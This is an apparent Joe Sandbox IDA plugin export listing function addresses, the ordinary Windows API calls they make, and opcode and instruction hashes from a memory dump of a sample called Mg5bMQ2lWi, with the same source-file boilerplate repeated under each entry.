Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
Instruction ID: 028ceee379c3c7d470caefb370f3d10d378470f307764de9520dc446ef7e13f5
Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
Instruction Fuzzy Hash: 1AF06D3090410AEFEB1CCF58D0A58BFB7A1EB48300B20856FE607C7790D638AE60DB58

Function 00416560 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416595

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 99ee45e58afab452ebd8d8099a4319ca8bb03e99333467587a6c742e65940f0d
Instruction ID: 13f77f5b12b5d4dba0df04b824f9bbdcdbf9abdef4ba7f4078844aaa66f06397
Opcode Fuzzy Hash: 99ee45e58afab452ebd8d8099a4319ca8bb03e99333467587a6c742e65940f0d
Instruction Fuzzy Hash: C3F013B2200510AFDB84CF9CD9C0F9373ECEB0C210B0881A6FA08CF24AD225EC108BB1

Function 004149C4 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149FF

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91

Function 0042CC98 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,0042CCE0,?,00000001,?,?,00000000,?,0042CD32,00000000,00452085,00000000,004520A6,?,00000000), ref: 0042CCC3

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 61041821089c7d4aa2000ec0e86c70dfe7be4184ca8188e9cf26529104da5cfb
Instruction ID: 1943a86784c022a2dfd859aef87f3de3c0de5fcd5c78e915f44ffa8231ae9d07
Opcode Fuzzy Hash: 61041821089c7d4aa2000ec0e86c70dfe7be4184ca8188e9cf26529104da5cfb
Instruction Fuzzy Hash: B0E06571304704BFD711EB629C93A5EBBACD745714B914476F500D7541D578AE009558

Function 0044FE24 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0044FE64

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b8d30b55bd9c337fb850a3ffead974af8be894f982605e1024d96d7d98714d33
Instruction ID: e92c98a8af308b3432749b2dbea91310ced2c99b4e9e22dcf80a84a4ab028b75
Opcode Fuzzy Hash: b8d30b55bd9c337fb850a3ffead974af8be894f982605e1024d96d7d98714d33
Instruction Fuzzy Hash: C9E092A13501083ED340EEAC7C42FA33BCC931A718F008037F988C7242C8619D148BA9

Function 0042E73C Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: f2e57c13329fa82bb562111542c19212575287ec657190e48755ffcde1de8f0a
Instruction ID: 307a162b73ad64172b1e6f06154ade3ab8019b251ee6aa90c4987cddc8a641e5
Opcode Fuzzy Hash: f2e57c13329fa82bb562111542c19212575287ec657190e48755ffcde1de8f0a
Instruction Fuzzy Hash: 80E0206178431165F23529156C83F7B120E83C0B08F9480267B50DD3D3DAAE9D09425E

Function 00406300 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(00000000,0042368C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00406329

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1

Function 0042DD0C Relevance: 1.5, APIs: 1, Instructions: 26registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 5e59f431e7dc3fbfe634ec8590c1537f060de66ed7aab2066b747fc67b6210b1
Instruction ID: f0f4a7cc191af20e9b9700f54d410718858f5ac06abb37c2f1ccc41e28cff8f4
Opcode Fuzzy Hash: 5e59f431e7dc3fbfe634ec8590c1537f060de66ed7aab2066b747fc67b6210b1
Instruction Fuzzy Hash: 05E07EB2610129AF9B40DE8CDC81EEB37ADEB1D350F408016FA08D7200C274EC519BB4

Function 00454114 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindClose.KERNEL32(00000000,000000FF,0046F950,00000000,0047073F,?,00000000,00470788,?,00000000,004708C1,?,00000000,0000003C,00000000), ref: 0045412A

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: e19e0392ffb8f942ef07e4f90012c062304df668bc5034957742c687a3574691
Instruction ID: 5eabd71f03f270c9e36328c123aabe4f760eecb17ac4c97f42f59bce307939db
Opcode Fuzzy Hash: e19e0392ffb8f942ef07e4f90012c062304df668bc5034957742c687a3574691
Instruction Fuzzy Hash: CEE065B0A04A004BCB14DF3A898425676D25FD5324F04C56AAC58CF3D6E63C84859A26

Function 0041468C Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00493E46,?,00493E68,?,?,00000000,00493E46,?,?), ref: 004146AB

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0

Function 00406F18 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F2C

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6989787615dda6fb0474b9a852aed77f7455facdbde297e08749939c69554e6e
Instruction ID: 1f586823f232578dbf745533d190da316c23ef772c10fc749b20f2ce5ea51255
Opcode Fuzzy Hash: 6989787615dda6fb0474b9a852aed77f7455facdbde297e08749939c69554e6e
Instruction Fuzzy Hash: E0D05B723091117AD620955F6C44DA76BDCCBC5770F11063EB558D72C1D7309C01C675

Function 0042365C Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00423608: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042361D

ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677

Part of subcall function 00423638: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423654

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: InfoParametersSystem$ShowWindow
String ID:
API String ID: 3202724764-0
Opcode ID: 1489a060ee1bcc8cc48c15b27d983b014cc6d9756e6ca662c79b076239964338
Instruction ID: 40ba6511a88705317f68f90b714cf273492cbff5df7e869aa0dea3a735aecdb5
Opcode Fuzzy Hash: 1489a060ee1bcc8cc48c15b27d983b014cc6d9756e6ca662c79b076239964338
Instruction Fuzzy Hash: 89D05E123831B03106307BB72805ACB86AC8D966AB389047BB5409B302E91E8A0A61AC

Function 004242D4 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(?,00000000), ref: 004242EC

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
Instruction ID: 772c2b490b6417829154bcce5d0a54014a2db275ddfc333997dbbca6f26d49c5
Opcode Fuzzy Hash: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
Instruction Fuzzy Hash: 7ED05EE27011702BCB01BAED54C4AC667CC9B8825AB1940BBF904EF257C678CE4083A8

Function 00466254 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00466F40,00000000,00000000,00000000,0000000C,00000000), ref: 0046626C

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0

Function 0042CCF0 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,00450C2B,00000000), ref: 0042CCFB

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 01dbdc36424fec664e934353753d4045270514496262de1bfab72665a96f96e3
Instruction ID: cee2652a42bb6fa335edebfce0b7cce520d77b1cbd3538a4821e8cc024acaa82
Opcode Fuzzy Hash: 01dbdc36424fec664e934353753d4045270514496262de1bfab72665a96f96e3
Instruction Fuzzy Hash: 66C08CE03222001A9A1065BD3CC911F06C8892833A3A41F37B438E32D2E23E88266028

Function 00406EC8 Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8D4,0040CE80,?,00000000,?), ref: 00406EE5

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7f8aa10a2b0ebcd99225cbdae7d816ffd0c8159e943a954a1b877cbd8b688861
Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
Opcode Fuzzy Hash: 7f8aa10a2b0ebcd99225cbdae7d816ffd0c8159e943a954a1b877cbd8b688861
Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C

Function 004072B0 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

SetCurrentDirectoryA.KERNEL32(00000000,?,0049627E,00000000,00496451,?,?,00000005,00000000,00496485,?,?,00000000), ref: 004072BB

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
Instruction ID: c18bf430a4858a09d5fd0626d157798880aaaa8ea81a5298b6cf69089c3012d4
Opcode Fuzzy Hash: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
Instruction Fuzzy Hash: B0B012E03D161B27CA0079FE4CC191A01CC46292163501B3A3006E71C3D83CC8080514

Function 0044FF8C Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93

Part of subcall function 0044FD14: GetLastError.KERNEL32(0044FB30,0044FDD6,?,00000000,?,004962F0,00000001,00000000,00000002,00000000,00496451,?,?,00000005,00000000,00496485), ref: 0044FD17

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ErrorFileLast
String ID:
API String ID: 734332943-0
Opcode ID: 40f744221a1c0ad34bc3dfd7c8217ba7111344780b163017895d6acbe08c1ff7
Instruction ID: f3a0f6ff35c414572697f21b60dc386cc542920b113ac52c9a1142ed5c58418d
Opcode Fuzzy Hash: 40f744221a1c0ad34bc3dfd7c8217ba7111344780b163017895d6acbe08c1ff7
Instruction Fuzzy Hash: 54C04CA1B0010147DF00AAAED5C1A0763D85E4E2093144076B504CF206D6A9D8084A24

Function 0042E317 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,0042E335), ref: 0042E328

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 15eed7d30ca8f87603f8d2fb4c6016cac4064a0446a0c9a22a0947d8b3773134
Instruction ID: 885b9387dc4d85ef1a6bcc41b3ac28186c42b97ac018e1411ad6f8b1d6607996
Opcode Fuzzy Hash: 15eed7d30ca8f87603f8d2fb4c6016cac4064a0446a0c9a22a0947d8b3773134
Instruction Fuzzy Hash: CFB09B7770C6006DB705DA95B45192D63E4D7C47203E14577F400D3580D93C58014918

Function 004165FC Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

73A25CF0.USER32(?), ref: 00416603

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
Instruction ID: 444a78761fbc6a727879d8c4239369b0bde5fc0390465f01f64749401816922a
Opcode Fuzzy Hash: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
Instruction Fuzzy Hash: CDA002756015049ADE04A7A5C849F662298BB44204FC915F971449B092C53C99008E58

Function 00447F7C Relevance: 1.4, APIs: 1, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
